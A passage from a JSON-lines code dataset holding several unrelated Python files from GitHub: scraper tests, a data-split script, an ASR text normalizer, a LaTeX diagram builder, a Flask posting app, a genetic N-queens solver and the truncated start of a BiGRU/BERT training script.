app_config\napp_config.DATABASE_NAME = 'carebot_test.db'\napp_config.date_cutoff = datetime.date(1997, 1, 1)\n\nfrom scrapers.npr_spreadsheet import SpreadsheetScraper\nfrom util.config import Config\nfrom util.models import Story\nfrom tests.test_util.db import clear_stories\n\nclass TestSpreadsheet(unittest.TestCase):\n source = {\n 'doc_key': 'foo-bar-baz'\n }\n\n def test_scrape_spreadsheet(self):\n \"\"\"\n Make sure we grab the right data from spreadsheets\n \"\"\"\n scraper = SpreadsheetScraper(self.source)\n stories = scraper.scrape_spreadsheet('tests/data/stories.xlsx')\n self.assertEqual(len(stories), 4)\n\n self.assertEqual(stories[0]['date'], '42467') # Crappy excel date format\n self.assertEqual(stories[0]['graphic_slug'], 'voting-wait-20160404')\n self.assertEqual(stories[0]['graphic_type'], 'Graphic')\n self.assertEqual(stories[0]['story_headline'], 'What Keeps Election Officials Up At Night? Fear Of Long Lines At The Polls')\n self.assertEqual(stories[0]['story_url'], 'http://www.npr.org/2016/04/07/473293026/what-keeps-election-officials-up-at-night-fear-of-long-lines-at-the-polls')\n self.assertEqual(stories[0]['contact'], 'Alyson Hurt')\n\n self.assertEqual(stories[0]['date'], '42467')\n self.assertEqual(stories[3]['graphic_slug'], 'seed-market-20160405')\n self.assertEqual(stories[3]['graphic_type'], 'Graphic')\n self.assertEqual(stories[3]['story_headline'], 'Big Seed: Consolidation Is Shrinking The Industry Even Further')\n self.assertEqual(stories[3]['story_url'], 'http://www.npr.org/sections/thesalt/2016/04/06/472960018/big-seed-consolidation-is-shrinking-the-industry-even-further')\n self.assertEqual(stories[3]['contact'], 'Alyson Hurt')\n\n @patch('util.s3.Uploader.upload', return_value='http://image-url-here')\n def test_write_spreadsheet(self, mock_upload):\n \"\"\"\n Make sure we save the stories to the database when scraping from a\n spreadsheet\n \"\"\"\n clear_stories()\n\n scraper = SpreadsheetScraper(self.source)\n stories = scraper.scrape_spreadsheet('tests/data/stories.xlsx')\n\n scraper.write(stories)\n\n results = Story.select()\n self.assertEqual(len(results), 4)\n\n for idx, story in enumerate(stories):\n self.assertEqual(results[idx].name, story['story_headline'])\n self.assertEqual(results[idx].url, story['story_url'])\n\n @patch('util.s3.Uploader.upload')\n def test_write_spreadsheet_duplicates(self, mock_upload):\n \"\"\"\n Make sure stories don't get inserted more than once\n \"\"\"\n mock_upload.return_value = 'http://image-url-here'\n\n clear_stories()\n\n scraper = SpreadsheetScraper(self.source)\n stories = scraper.scrape_spreadsheet('tests/data/stories.xlsx')\n\n # Insert the stories\n scraper.write(stories)\n results = Story.select()\n self.assertEqual(len(results), 4)\n\n # Now insert them again and make sure we don't have duplicates\n scraper.write(stories)\n results = Story.select()\n self.assertEqual(len(results), 4)\n","repo_name":"thecarebot/carebot","sub_path":"tests/test_spreadsheet.py","file_name":"test_spreadsheet.py","file_ext":"py","file_size_in_byte":3336,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"19"} +{"seq_id":"16893407415","text":"import shutil\nimport random\nfrom split_data_utils import SplitData\n\ndef main():\n \"\"\"Main code\"\"\"\n SplitData.InitBashArgs()\n args = SplitData.InitBashArgs.get_args()\n\n images_dir = args.images_dir\n test_images_dir = args.test_images_dir\n train_images_dir = args.train_images_dir\n labels_dir = args.labels_dir\n test_labels_dir = 
args.test_labels_dir\n    train_labels_dir = args.train_labels_dir\n\n    images = SplitData.Dataset.get_ordered_path(images_dir)\n    labels = SplitData.Dataset.get_ordered_path(labels_dir)\n\n    possible_indices = list(range(10))\n    first_index = random.choice(possible_indices)\n    possible_indices.remove(first_index)\n    second_index = random.choice(possible_indices)\n\n    for file_id, _ in enumerate(images):\n        if (file_id % 10 == first_index) or (file_id % 10 == second_index):\n            shutil.copyfile(images_dir + images[file_id], test_images_dir + images[file_id])\n            shutil.copyfile(labels_dir + labels[file_id], test_labels_dir + labels[file_id])\n        else:\n            shutil.copyfile(images_dir + images[file_id], train_images_dir + images[file_id])\n            shutil.copyfile(labels_dir + labels[file_id], train_labels_dir + labels[file_id])\n\n        if not file_id % 10:\n            possible_indices = list(range(10))\n            first_index = random.choice(possible_indices)\n            possible_indices.remove(first_index)\n            second_index = random.choice(possible_indices)\n\nif __name__ == '__main__':\n    main()\n","repo_name":"rohand2412/opencv-capture-data-for-ml","sub_path":"split_data.py","file_name":"split_data.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"22898587621","text":"from __future__ import print_function\n\nimport sys\nimport argparse\n\nfrom german_asr_lm_tools.normalize_numbers import NumberFormatter\n\n# Also change some very frequent words to new orthographic rules in German\n# e.g. muß -> muss\nword_replace_rules = {'muß':'muss', 'daß':'dass', 'Daß':'dass', '-$':' ', '-$':' ', '$':'', '$':'', '-':'' , ' ' : ' '}\n\ndef process_input(norm_number_words=False, convert_numbers=False):\n    if norm_number_words or convert_numbers:\n        nf = NumberFormatter()\n\n    for line in sys.stdin:\n        line = line.replace('Das', 'das')\n        # remove ähs, ähms and unks as well as hesitations (häs)\n        line = line.replace('Äh', '').replace('äh', '').replace('Ähm', '').replace('ähm', '').replace('häs', '').replace('<unk>', '').replace('<UNK>', '')\n        split = line.split()\n        if norm_number_words or convert_numbers:\n            split = nf.normalize_text(split, convert_to_numbers=convert_numbers)\n        if len(split) > 1:\n            if len(split[1]) > 1:\n                split[1] = split[1][0].upper() + split[1][1:]\n                output = ' '.join(split)\n            elif len(split[1]) == 1:\n                split[1] = split[1][0].upper()\n                output = ' '.join(split)\n            else:\n                #if we have issues just pass the line unchanged\n                output = line\n\n            for replace_rule in word_replace_rules.items():\n                output = output.replace(replace_rule[0], replace_rule[1])\n            print(output)\n\n        else:\n            #if we have issues just pass the line unchanged\n            print(line)\n\n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser(description='Prepares the files from the TUDA corpus (XML) into text transcriptions for KALDI')\n    #parser.add_argument('-f', '--file', dest='file', help='process this (python pickle) lexicon file', type=str)\n    parser.add_argument('-w', '--norm-number-words', dest='norm_number_words', help='Normalize number words (drei und sechzig -> dreiundsechzig)', action='store_true', default=False)\n    parser.add_argument('-n', '--convert-numbers', dest='convert_numbers', help='Convert numbers (drei und sechzig -> 63, dreiundsechzig -> 63)', action='store_true', default=False)\n\n    args = parser.parse_args()\n
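    # Illustrative invocation (assumed transcript file name): pipe lines\n    # through stdin, e.g.  cat hyps.txt | python output_normalizer.py -w\n    process_input(args.norm_number_words,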
args.convert_numbers)\n","repo_name":"uhh-lt/kaldi-tuda-de","sub_path":"s5_r2/local/output_normalizer.py","file_name":"output_normalizer.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","stars":171,"dataset":"github-code","pt":"19"} +{"seq_id":"22896067256","text":"import pyexlatex as pl\nimport pyexlatex.table as lt\nimport pyexlatex.presentation as lp\nimport pyexlatex.graphics as lg\nimport pyexlatex.layouts as ll\n\n\ndef get_model_structure_graphic() -> lg.TikZPicture:\n inputs_block_options = [\n 'fill=orange!30'\n ]\n\n model_block_options = [\n 'fill=blue!50'\n ]\n\n sub_model_block_options = [\n 'fill=blue!90'\n ]\n\n step_block_options = [\n 'fill=cyan!20'\n ]\n\n outputs_block_options = [\n 'fill=green!20'\n ]\n\n text_options = [\n 'text=white'\n ]\n\n step_text_options = [\n 'text=black'\n ]\n\n inputs_text_options = outputs_text_options = step_text_options\n\n arrow_options = [\n 'line width=0.75mm',\n ]\n\n inputs_rectangle = lg.Rectangle(2, 8, offset=(-3.35, 4), contents=pl.Bold('Inputs'),\n shape_options=inputs_block_options,\n text_options=inputs_text_options)\n\n model_rectangle = lg.Rectangle(5, 8, offset=(1.25, 4), contents=pl.Bold('Model'), content_position='bottom',\n content_offset=0.2, shape_options=model_block_options,\n text_options=text_options)\n\n outputs_rectangle = lg.Rectangle(2, 8, offset=(5.85, 4), contents=pl.Bold('Outputs'),\n shape_options=outputs_block_options,\n text_options=outputs_text_options)\n\n sub_model_rectangles = []\n step_rectangles = []\n for i in range(3):\n y_offset = 1.75 + i * 2.5\n sub_model_rectangles.append(\n lg.Rectangle(4, 1.75, offset=(1.25, y_offset), contents='Sub-Model',\n shape_options=sub_model_block_options, text_options=text_options,\n content_position='bottom'),\n )\n for j in range(3):\n x_offset = j * 1.25\n step_rectangles.append(\n lg.Rectangle(1.1, 1, offset=(x_offset, y_offset + 0.2), contents='Step',\n shape_options=step_block_options, text_options=step_text_options,\n )\n )\n\n arrows = [\n lg.Arrow((-2.3, 4), (-1.3, 4), options=arrow_options),\n lg.Arrow((3.8, 4), (4.8, 4), options=arrow_options),\n ]\n\n return lg.TikZPicture([\n inputs_rectangle,\n model_rectangle,\n *sub_model_rectangles,\n *step_rectangles,\n outputs_rectangle,\n *arrows,\n ])\n","repo_name":"nickderobertis/fin-model-course","sub_path":"fin_model_course/pltemplates/graphics/model_structure.py","file_name":"model_structure.py","file_ext":"py","file_size_in_byte":2511,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"19"} +{"seq_id":"6664289676","text":"from flask import Flask, render_template, request, redirect, flash, session, jsonify, abort, url_for\nfrom werkzeug.utils import secure_filename\nimport os\nfrom dotenv import load_dotenv\nfrom src.models import db, User_account, User_comment, Post, Post_Vote\nfrom flask_bcrypt import Bcrypt\nfrom src.repositories.user_account_repository import user_repository_singleton\nfrom src.repositories.post_repository import post_repository_singleton\nfrom sqlalchemy import update\nimport requests\nimport time\nimport atexit\nfrom apscheduler.schedulers.background import BackgroundScheduler\nfrom post_bot import post_bot_singleton\n\n\nload_dotenv()\n\napp = Flask(__name__)\n\napp.config['SQLALCHEMY_DATABASE_URI'] = os.getenv('DATABASE_URI')\napp.secret_key = os.getenv('APP_SECRET_KEY')\n\napp.config['YOUTUBE_API_KEY'] = os.environ.get('YOUTUBE_API_KEY')\n\ndb.init_app(app)\n\nbcrypt = 
Bcrypt(app)\n\n@app.before_first_request\ndef init_scheduler():\n    scheduler = BackgroundScheduler()\n    scheduler.add_job(func=post_bot_singleton.preform_post, trigger=\"interval\", seconds= post_bot_singleton.UPDATE_SECONDS)\n    scheduler.start()\n    # Shut down the scheduler when exiting the app\n    atexit.register(lambda: scheduler.shutdown())\n\n\ndef get_index_render_template(for_posts):\n    states = []\n    username = None\n    if session.get('user') != None:\n        current_user_ID = int(session.get('user')['user_account_id'])\n        user = user_repository_singleton.get_user_by_id(current_user_ID)\n        if user != None: \n            username = session['user']['username']\n            for post in for_posts:\n                vote_update = Post_Vote.query.get((current_user_ID, post.post_id))\n                vote_state = 0\n                if vote_update != None:\n                    if vote_update.upvote:\n                        vote_state = 1\n                    else:\n                        vote_state = 2\n                states.append(vote_state)\n    if username == None:\n        return render_template('index.html', posts = for_posts , vote_states = states)\n    else:\n        return render_template('index.html', posts = for_posts , vote_states = states, username = username)\n\n@app.route('/', methods=['POST', 'GET'])\ndef index():\n    all_posts = post_repository_singleton.get_all_posts()\n\n    return(get_index_render_template(all_posts))\n\n\n@app.route('/updatePostVotes', methods=['POST'])\ndef updatePostVote():\n    if session.get('user') != None:\n        current_user_ID = int(session.get('user')['user_account_id'])\n        user = user_repository_singleton.get_user_by_id(current_user_ID)\n        if user != None: \n            postID = request.form.get(\"post\")\n            vote = request.form.get(\"vote\")\n            \n            if postID.isnumeric() and vote.isnumeric():\n                if int(vote) >= 1 and int(vote) <=2:\n                    post_repository_singleton.vote_post(int(current_user_ID), int(postID), vote)\n            vote_update = Post_Vote.query.get((current_user_ID, postID))\n            vote_state = 0\n            if vote_update != None:\n                if vote_update.upvote:\n                    vote_state = 1\n                else:\n                    vote_state = 2\n            return(jsonify(\n                status=\"200\",\n                vote_count=post_repository_singleton.get_post_by_id(postID).get_vote_count(),\n                state=vote_state))\n        else:\n            flash('Please log in to upvote posts')\n            print(\"error user not found\")\n            return(jsonify(status=\"404\"))\n    else:\n        flash('Please log in to upvote posts')\n        print(\"error no user logged in\")\n        return(jsonify(status=\"400\"))\n\n@app.get('/profile/settings')\ndef settings():\n    if 'user' not in session:\n        return redirect('/')\n\n    first_name=session['user']['first_name']\n    last_name=session['user']['last_name']\n    username=session['user']['username']\n    profile_path=session['user']['profile_path']\n\n    return render_template('settings.html', first_name=first_name, last_name=last_name, username=username, profile_path=profile_path)\n\n\n@app.route('/post', methods=['GET'])\ndef post():\n    post_id = request.args.get('post_id', None)\n    post = post_repository_singleton.get_post_by_id(post_id)\n    vote_state = 0\n    if post != None:\n        if session.get('user') != None:\n            current_user_ID = int(session.get('user')['user_account_id'])\n            user = user_repository_singleton.get_user_by_id(current_user_ID)\n            if user != None: \n                vote_update = Post_Vote.query.get((current_user_ID, post.post_id))\n                if vote_update != None:\n                    if vote_update.upvote:\n                        vote_state = 1\n                    else:\n                        vote_state = 2\n        return render_template('post.html', post = post, vote_state = vote_state)\n    else:\n        ## return 404\n        return abort(404)\n
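\n# vote_state convention used by the routes above: 0 = the current user has not\n# voted on this post, 1 = upvote, 2 = downvote (mirrors Post_Vote.upvote).\n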
\n\n@app.get('/profile')\ndef profile():\n    if 'user' not in session:\n        return redirect('/')\n\n    user_id = session['user']['user_account_id']\n    first_name=session['user']['first_name']\n    last_name=session['user']['last_name']\n    username=session['user']['username']\n    profile_path=session['user']['profile_path']\n    \n    user_posts = post_repository_singleton.get_all_posts_by_user(user_id)\n    return render_template('profile.html', first_name=first_name, last_name=last_name, username=username, profile_path=profile_path, user_posts=user_posts)\n\n@app.post('/profile')\ndef get_user_posts():\n    # all_posts = post_repository_singleton.get_all_posts()\n    \n    return render_template('profile.html')\n\n\n@app.route(\"/reply-comment/<int:parent_post_id>\", methods=['POST'])\n## TODO: Login needs to be required to comment\ndef create_comment(parent_post_id):\n    text = request.form.get('text')\n    if not text:\n        flash('Empty Comment. Try again.', category='error')\n    else: \n        post = Post.query.filter_by(post_id = parent_post_id)\n        if session.get('user') != None:\n            current_user_ID = int(session.get('user')['user_account_id'])\n            if post:\n                comment = User_comment(comment_text=text, parent_post_id=parent_post_id, commented_by_id = current_user_ID)\n                db.session.add(comment)\n                db.session.commit()\n            else:\n                flash('Post does not exist.', category='error')\n        else:\n            print('error no user logged in')\n    return redirect(url_for('post', post_id=parent_post_id))\n\n\n@app.get('/create_post')\ndef get_create_post():\n    if 'user' not in session:\n        return redirect('/login_page')\n\n    username=session['user']['username']\n    return render_template('create_post.html', username=username)\n\n@app.post('/create_post')\ndef create_post():\n    title = request.form.get('title')\n    text = request.form.get('text')\n\n    if title and text:\n        post_repository_singleton.create_post_text(title, text, session['user']['user_account_id'])\n\n    elif title and 'image' in request.files:\n        image = request.files['image']\n\n        if image.filename == '':\n            return redirect('/create_post')\n        \n        if image.filename.rsplit('.', 1)[1].lower() not in ['jpg', 'jpeg', 'gif', 'png']:\n            return redirect('/create_post')\n        \n        safe_image_file = secure_filename(image.filename)\n        image.save(os.path.join('static/assets', 'post_images', safe_image_file))\n\n        post_repository_singleton.create_post_stored_image(title, safe_image_file, session['user']['user_account_id'])\n\n    elif title and request.form.get('link'):\n        url = request.form.get('link')\n        embed_video = url.replace(\"watch?v=\", \"embed/\")\n\n        post_repository_singleton.create_post_embedded_video(title, embed_video, session['user']['user_account_id'])\n\n    elif title and 'video' in request.files:\n        video = request.files['video']\n\n        if video.filename == '':\n            return redirect('/create_post')\n        \n        if video.filename.rsplit('.', 1)[1].lower() not in ['mp4', 'ogg', 'webm']:\n            return redirect('/create_post')\n\n        safe_video_file = secure_filename(video.filename)\n        video.save(os.path.join('static/assets', 'post_videos', safe_video_file))\n        \n        post_repository_singleton.create_post_stored_video(title, safe_video_file, session['user']['user_account_id'])\n    else:\n        return redirect('/create_post')\n\n    return redirect('/')\n\n\n@app.get('/register_form')\ndef register_form():\n    return render_template('register.html')\n\n@app.post('/register')\ndef register():\n    first_name = request.form.get('firstname')\n    last_name = request.form.get('lastname')\n    username = request.form.get('username')\n    password = request.form.get('password')\n    password2 =
request.form.get('password2')\n\n    if (password != password2):\n        flash('Passwords do not match. Please try again.')\n        return redirect('/register_form')\n\n    existing_user = User_account.query.filter_by(username=username).first()\n    if existing_user:\n        flash('Username already taken.')\n        return redirect('/register_form')\n\n    hashed_bytes = bcrypt.generate_password_hash(password, int(os.getenv('BCRYPT_ROUNDS')))\n    hashed_password = hashed_bytes.decode('utf-8')\n\n    if 'profile' not in request.files:\n        flash('Error processing file. Please try again')\n        return redirect('/register_form')\n\n    profile_picture = request.files['profile']\n\n    if profile_picture.filename == '':\n        flash('Error processing file. Please try again')\n        return redirect('/register_form')\n    \n    if profile_picture.filename.rsplit('.', 1)[1].lower() not in ['jpg', 'jpeg', 'gif', 'png']:\n        flash('Please use one of the approved file formats (jpg, jpeg, gif, png)')\n        return redirect('/register_form')\n\n    safe_filename = secure_filename(f'{username}-{profile_picture.filename}')\n\n    profile_picture.save(os.path.join('static/assets', 'profile-pics', safe_filename))\n\n    user_repository_singleton.create_user(first_name, last_name, username, hashed_password, safe_filename)\n    existing_user = User_account.query.filter_by(username=username).first()\n    flash('Account created successfully.')\n    session['user'] = {\n        'user_account_id': existing_user.user_account_id,\n        'first_name': existing_user.first_name,\n        'last_name': existing_user.last_name,\n        'username': existing_user.username,\n        'profile_path': existing_user.profile_path,\n    }\n    return redirect('/profile')\n\n@app.get('/login_page')\ndef login_page():\n    return render_template('login.html')\n\n@app.post('/login')\ndef login():\n    username = request.form.get('username')\n    password = request.form.get('password')\n\n    existing_user = User_account.query.filter_by(username=username).first()\n    if not existing_user:\n        flash('Error logging in. Please try again.')\n        return redirect('/login_page')\n\n    if not bcrypt.check_password_hash(existing_user.user_password, password):\n        flash('Error logging in. 
Please try again.')\n        return redirect('/login_page')\n\n    session['user'] = {\n        'user_account_id': existing_user.user_account_id,\n        'first_name': existing_user.first_name,\n        'last_name': existing_user.last_name,\n        'username': existing_user.username,\n        'profile_path': existing_user.profile_path,\n    }\n    return redirect('/')\n\n@app.post('/logout')\ndef logout():\n    if 'user' not in session:\n        return redirect('/')\n\n    session.pop('user')\n    return redirect('/')\n\n\n@app.route('/delete/<user_account_id>', methods=['POST'])\ndef delete(user_account_id):\n    user_account_id = session['user']['user_account_id']\n    user_to_delete = User_account.query.get(user_account_id)\n    db.session.delete(user_to_delete)\n    db.session.commit()\n    return(get_index_render_template(post_repository_singleton.get_all_posts()))\n    \n\n@app.get('/search')\ndef search():\n    topic = request.args.get('topic')\n    order = request.args.get('order')\n    if order:\n        if order == \"1\":\n            all_posts = post_repository_singleton.get_all_posts_ordered()\n            return(get_index_render_template(all_posts))\n        elif order == \"2\":\n            all_posts = post_repository_singleton.get_all_posts_ordered_by_vote()\n            return(get_index_render_template(all_posts))\n    \n    searched_posts = post_repository_singleton.search_post(topic)\n    return(get_index_render_template(searched_posts))\n\n@app.get('/update_user_form')\ndef update_user_form():\n\n    if 'user' not in session:\n        return redirect('/')\n    first_name=session['user']['first_name']\n    last_name=session['user']['last_name']\n    username=session['user']['username']\n    return render_template('update_user.html', first_name=first_name, last_name=last_name, username=username)\n\n@app.post('/update_user')\ndef update_user():\n    if 'user' not in session:\n        return redirect('/login')\n\n    user_id=session['user']['user_account_id']\n    first_name=session['user']['first_name']\n    last_name=session['user']['last_name']\n    username=session['user']['username']\n    \n    password = request.form.get('password')\n\n    existing_user = User_account.query.filter_by(user_account_id=user_id).first()\n    if not bcrypt.check_password_hash(existing_user.user_password, password):\n        flash('Incorrect Password')\n        return redirect('/update_user_form')\n\n    new_username = request.form.get('username')\n    if username != new_username:\n        existing_user = User_account.query.filter_by(username=new_username).first()\n        if existing_user is not None:\n            flash('Username already taken.')\n            return redirect('/update_user_form')\n        user_repository_singleton.update_username(user_id, new_username)\n\n    new_first_name = request.form.get('firstname')\n    if first_name != new_first_name:\n        user_repository_singleton.update_user_first_name(user_id, new_first_name)\n\n    new_last_name = request.form.get('lastname')\n    if last_name != new_last_name:\n        user_repository_singleton.update_user_last_name(user_id, new_last_name)\n\n    new_pw1 = request.form.get('new_pw')\n    new_pw2 = request.form.get('new_pw2')\n\n    if new_pw1 != '' and new_pw2 != '':\n        if new_pw1 != new_pw2:\n            flash('New passwords do not match')\n            return redirect('/update_user_form')\n        else:\n            hashed_bytes = bcrypt.generate_password_hash(new_pw1, int(os.getenv('BCRYPT_ROUNDS')))\n            hashed_password = hashed_bytes.decode('utf-8')\n            user_repository_singleton.update_password(user_id, hashed_password)\n\n    session.pop('user')\n\n    existing_user = User_account.query.filter_by(user_account_id=user_id).first()\n    session['user'] = {\n        'user_account_id': existing_user.user_account_id,\n        'first_name': 
existing_user.first_name,\n        'last_name': existing_user.last_name,\n        'username': existing_user.username,\n        'profile_path': existing_user.profile_path,\n    }\n    \n    return redirect('/profile/settings')\n\n\n# distinct rule so this route does not collide with the account-deletion route above\n@app.route('/delete-comment/<comment_id>', methods=['POST'])\ndef delete_comment(comment_id):\n    comment_id = int(comment_id)\n    comment_to_delete = User_comment.query.get(comment_id)\n    db.session.delete(comment_to_delete)\n    db.session.commit()\n    return(get_index_render_template(post_repository_singleton.get_all_posts()))\n","repo_name":"Fenshway/ITSC-3155-Final-Project","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":15945,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} {"seq_id":"21508177731","text":"import numpy as np\nimport random\n\n\nclass Solver_8_queens:\n\n    board_width = 8\n    cross_prob = 0.4\n    mut_prob = 0.2\n    pop_size = 101\n\n    FitValue = np.zeros((pop_size, 1), dtype=int) # stores the fitness values for the whole population\n    population = np.zeros((pop_size, board_width), dtype=int)\n\n    def __init__(self, pop_size=80, cross_prob=0.25, mut_prob=0.9):\n        self.pop_size = pop_size\n        self.cross_prob = cross_prob\n        self.mut_prob = mut_prob\n\n    def solve(self, min_fitnes=0.07, max_epochs=50000):\n        iter = 0\n        self.generate_population()\n\n        viner, ibest = self.CalculateFitnesses()\n        while viner < 0 and iter < max_epochs and float(self.FitValue[ibest])/28 > min_fitnes:\n            iter = iter + 1\n            self.SortIndivids()\n            self.Crossing()\n            self.Mutation()\n            viner, ibest = self.CalculateFitnesses()\n\n        return self.FitValue[ibest], iter, self.Visual(self.population[ibest])\n\n    def generate_population(self): # Generate the initial population\n        for hromosom in self.population:\n            for position in range(len(hromosom)):\n                hromosom[position] = random.randrange(0, self.board_width-1, 1)\n\n    def CalculateFitnesses(self):\n        BestFit = 2 * self.board_width\n        winner = -1\n        ibest = 0\n        for i in range(self.pop_size):\n            Fit_V = self.Fitness(self.population[i])\n            self.FitValue[i] = Fit_V\n            if Fit_V < BestFit:\n                BestFit = Fit_V\n                ibest = i\n            if BestFit == 0:\n                winner = i\n                ibest = i\n                break\n        return winner, ibest\n\n    def Fitness(self, gen):\n        Fit = 0\n        for igen in range(0, self.board_width - 1, 1):\n            for jgen in range(igen + 1, self.board_width, 1):\n                if gen[igen] == gen[jgen] or abs(gen[igen] - gen[jgen]) == abs(igen - jgen) or abs(\n                        gen[igen] + gen[jgen]) == abs(igen + jgen):\n                    Fit = Fit + 1\n\n        return Fit\n\n    def SortIndivids(self):\n        for i in range(self.pop_size - 1):\n            for j in range(i + 1, self.pop_size):\n                if self.FitValue[i] > self.FitValue[j]:\n                    a = self.population[j].copy()\n                    self.population[j] = self.population[i]\n                    self.population[i] = a\n\n                    b = self.FitValue[j].copy()\n                    self.FitValue[j] = self.FitValue[i]\n                    self.FitValue[i] = b\n\n    def Crossing(self):\n        ngood = self.pop_size // 2\n        nthebest = self.pop_size // 4\n\n        for igood in range(ngood):\n            ithebest = random.randrange(0, 32767, 1) % (nthebest + 1)\n            while igood == ithebest:\n                ithebest = random.randrange(0, 32767, 1) % (nthebest + 1)\n                break\n\n            if ithebest == nthebest:\n                ithebest = self.pop_size // 2 + random.randrange(0, 32767, 1) % (self.pop_size // 2)\n\n            parent1 = self.population[igood]\n            parent2 = self.population[ithebest]\n            parent1, parent2 = self.DoCross(parent1, parent2)\n\n            self.population[2 * igood] = parent1\n            self.population[2 * igood + 1] = parent2\n\n    def DoCross(self, parent1, parent2):\n        breakpoint = random.randrange(0, 
self.board_width-1, 1)\n        child1 = np.zeros(self.board_width, dtype=np.uint8)\n        child2 = np.zeros(self.board_width, dtype=np.uint8)\n\n        for i in range(breakpoint):\n            child1[i] = parent1[i]\n            child2[i] = parent2[i]\n\n        # copy the tail from the other parent, starting at the breakpoint so no gene is dropped\n        for i in range(breakpoint, self.board_width):\n            child1[i] = parent2[i]\n            child2[i] = parent1[i]\n        return child1, child2\n\n    def Mutation(self):\n        for i in range(int(self.mut_prob * self.pop_size)):\n            n = random.randrange(0, self.pop_size, 1)\n            k = random.randrange(0, self.board_width-1, 1)\n            self.population[n, k] = random.randrange(0, self.board_width-1, 1)\n\n    def Visual(self, gen):\n        visualization = np.zeros((self.board_width, self.board_width), dtype='<U1')\n        for j in range(self.board_width):\n            for i in range(self.board_width):\n                if gen[j] == i:\n                    visualization[i, j] = 'Q'\n                else:\n                    visualization[i, j] = '+'\n        return visualization\n\n\n\n\n\n\n\n","repo_name":"SlavaCat118/Mod_Matrix_Randomizer","sub_path":"nqueens1.py","file_name":"nqueens1.py","file_ext":"py","file_size_in_byte":4494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} {"seq_id":"34754213862","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom .humble_response_exception import HumbleResponseException\n\n__license__ = \"MIT\"\n\n\nclass HumbleAuthenticationException(HumbleResponseException):\n    \"\"\"\n    Authentication failed due to a rejected authentication cookie\n    \"\"\"\n\n    def __init__(self, *args, **kwargs):\n        \"\"\"\n        Parameterized constructor for the HumbleAuthenticationException.\n        :param list args: (optional) Extra positional args to pass to the request.\n        :param dict kwargs: (optional) Extra keyword args to pass to the request.\n        \"\"\"\n\n        super(HumbleAuthenticationException, self).__init__(*args, **kwargs)\n","repo_name":"talonius/hb-downloader","sub_path":"hb_downloader/humble_api/exceptions/humble_authentication_exception.py","file_name":"humble_authentication_exception.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":195,"dataset":"github-code","pt":"19"} {"seq_id":"1845829859","text":"\"\"\"\nPython version : 3.8\nDescription : Trains a 2-layered BiGRU classifier initialized with pre-trained BERT-based Classifier\n\"\"\"\n\n# %% Loading Libraries\nimport os, sys, time\nimport random\nimport argparse\nfrom pathlib import Path\nimport logging\nfrom torch import cuda\nfrom tqdm import tqdm \nimport pickle\n\nfrom collections import Counter\n\nimport numpy as np\nimport pandas as pd\n\nfrom sklearn.model_selection import train_test_split\n\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom torch.nn import functional as F\nfrom torch.utils.data import TensorDataset, DataLoader, RandomSampler\n\nfrom transformers import BertTokenizer, BertForSequenceClassification\n\n# %% Loading custom evaluation libraries \nsys.path.append('../metrics/')\nfrom performance import f1_score_func, accuracy_per_class\n\n# Loading the custom utility library\nsys.path.append('../utilities/')\nfrom load_data import FetchData\nfrom utils import merge_and_create_dataframe\nfrom traininghelpers import trainGRUBERT, evaluateGRUBERT\n\n# Loading the custom GRU architecture\nsys.path.append('../architectures/')\nfrom GRUClassifier import BiGRUBertClassifier\n\n# %% Setting up the Argparser\nparser = argparse.ArgumentParser(description=\"Training a 2-layered BiGRU classifier initialized with pre-trained BERT-based Classifier\")\nparser.add_argument('--pretrained_model', type=str, 
default=\"bert\", help=\"Pre-trained model to initialize the BiGRU model\")\nparser.add_argument('--mode', type=str, default=\"train\", help=\"Can be train or evaluate\")\nparser.add_argument('--data_to_load_pretrain_model', type=str, default='alpha-dreams', help=\"\"\"Datasets to be loaded for pre-trained model (can be \"alpha-dreams\", \"dreams-silk\", \"alpha-silk\", or \"alpha-dreams-silk\")\"\"\")\nparser.add_argument('--data_to_train', type=str, default='valhalla-berlusconi', help=\"\"\"Datasets to be evaluated (can be \"traderoute-agora\" or \"valhalla-berlusconi\")\"\"\")\nparser.add_argument('--data_dir', type=str, default='../data', help=\"\"\"Data directory of the pre-processed data (if your data is not pre-processed, we recommend you to go to the statistical model and process it first.)\"\"\")\nparser.add_argument('--bert_layer', type=str, default=\"weighted-sum-last-four\", help=\"\"\"Bert layer to extract embeddings from. Layer can only be last, second-to-last, first, weighted-sum-last-four, all, or concat-last-4 \"\"\")\nparser.add_argument('--load_model', type=str, default=\"../models/bert/epoch_39.model\", help=\"Loading the trained model\")\nparser.add_argument('--save_model_dir', type=str, default=os.path.join(os.getcwd(), \"../models/knowledge-transfer/valhalla-berlusconi/weighted-sum-last-four/\"), help=\"\"\"Directory for models to be saved\"\"\")\nparser.add_argument('-lr', type=float, default=4e-5, help=\"learning rate\")\nparser.add_argument('--batch_size', type=int, default=32, help=\"Batch Size\")\nparser.add_argument('--nb_epochs', type=int, default=100, help=\"Number of Epochs\")\nparser.add_argument(\"--hidden_units\", type=int, default=768, help=\"Number of hidden units \")\nparser.add_argument(\"--embedding_len\", type=int, default=768, help=\"Embedding size \")\nparser.add_argument('--max_seq_len', type=int, default=512, help=\"Maximum Sequence length the model will support\")\nparser.add_argument('--n_layers', type=int, default=2, help=\"Number of Bi-GRU layers\")\nparser.add_argument('--early_stopping', type=bool, default=True, help=\"Early stopping to stop training when early_stopping_metric doesn’t improve\")\nparser.add_argument('--eval_per_steps', type=int, default=2000, help=\"Evaluate after n number of steps in training data\")\nparser.add_argument('--delta', type=float, default=0.01, help=\"Minimum change for Early Stopping\")\nparser.add_argument('--patience', type=int, default=3, help=\"Early Stopping patience\")\nparser.add_argument('--seed', type=int, default=1111, help='Random seed value')\nparser.add_argument('-dropout', type=float, default=0.65, help=\"Dropout for the linear layer to 